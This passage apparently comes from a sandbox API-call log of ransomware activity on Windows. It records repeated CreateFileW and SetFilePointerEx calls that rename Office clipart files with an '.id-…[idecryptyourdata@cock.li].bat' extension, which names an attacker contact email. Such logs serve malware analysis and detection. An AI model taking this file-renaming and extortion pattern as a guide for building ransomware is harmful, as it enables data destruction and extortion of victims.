returned 1 [0164.396] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.396] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.396] CloseHandle (hObject=0x4c8) returned 1 [0164.397] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.397] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.397] CloseHandle (hObject=0x4c8) returned 1 [0164.398] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.398] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.398] CloseHandle (hObject=0x4c8) returned 1 [0164.400] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.400] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.400] CloseHandle (hObject=0x4c8) returned 1 [0164.402] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.402] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.402] CloseHandle (hObject=0x4c8) returned 1 [0164.403] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.403] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.403] CloseHandle (hObject=0x4c8) returned 1 [0164.404] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.404] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.404] CloseHandle (hObject=0x4c8) returned 1 [0164.405] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.405] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197979.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.405] CloseHandle (hObject=0x4c8) returned 1 [0164.407] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.407] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.407] CloseHandle (hObject=0x4c8) returned 1 [0165.261] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.261] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.262] CloseHandle (hObject=0x434) returned 1 [0165.262] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.263] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.263] CloseHandle (hObject=0x434) returned 1 [0165.264] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.264] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.264] CloseHandle (hObject=0x434) returned 1 [0165.265] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.265] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.266] CloseHandle (hObject=0x434) returned 1 [0165.267] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.267] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.268] CloseHandle (hObject=0x434) returned 1 [0165.269] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.270] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.270] CloseHandle (hObject=0x434) returned 1 [0165.271] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.271] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.271] CloseHandle (hObject=0x434) returned 1 [0165.272] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.272] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.273] CloseHandle (hObject=0x434) returned 1 [0165.275] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.275] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.276] CloseHandle (hObject=0x434) returned 1 [0165.276] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.276] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.277] CloseHandle (hObject=0x434) returned 1 [0165.278] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.278] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.278] CloseHandle (hObject=0x434) returned 1 [0165.279] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.279] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.279] CloseHandle (hObject=0x434) returned 1 [0165.281] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.281] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.281] CloseHandle (hObject=0x434) returned 1 [0165.282] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.282] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.282] CloseHandle (hObject=0x434) returned 1 [0165.287] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.287] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.328] CloseHandle (hObject=0x434) returned 1 [0165.329] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.329] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.330] CloseHandle (hObject=0x434) returned 1 [0165.333] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.333] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.333] CloseHandle (hObject=0x434) returned 1 [0165.334] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.334] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.561] CloseHandle (hObject=0x434) returned 1 [0165.938] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.939] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238983.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.939] CloseHandle (hObject=0x52c) returned 1 [0165.940] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.940] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241781.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.940] CloseHandle (hObject=0x52c) returned 1 [0165.943] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.943] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250504.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.944] CloseHandle (hObject=0x52c) returned 1 [0165.945] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.945] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250997.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.945] CloseHandle (hObject=0x52c) returned 1 [0165.946] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.946] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0251007.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.947] CloseHandle (hObject=0x52c) returned 1 [0165.947] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.947] SetFilePointerEx 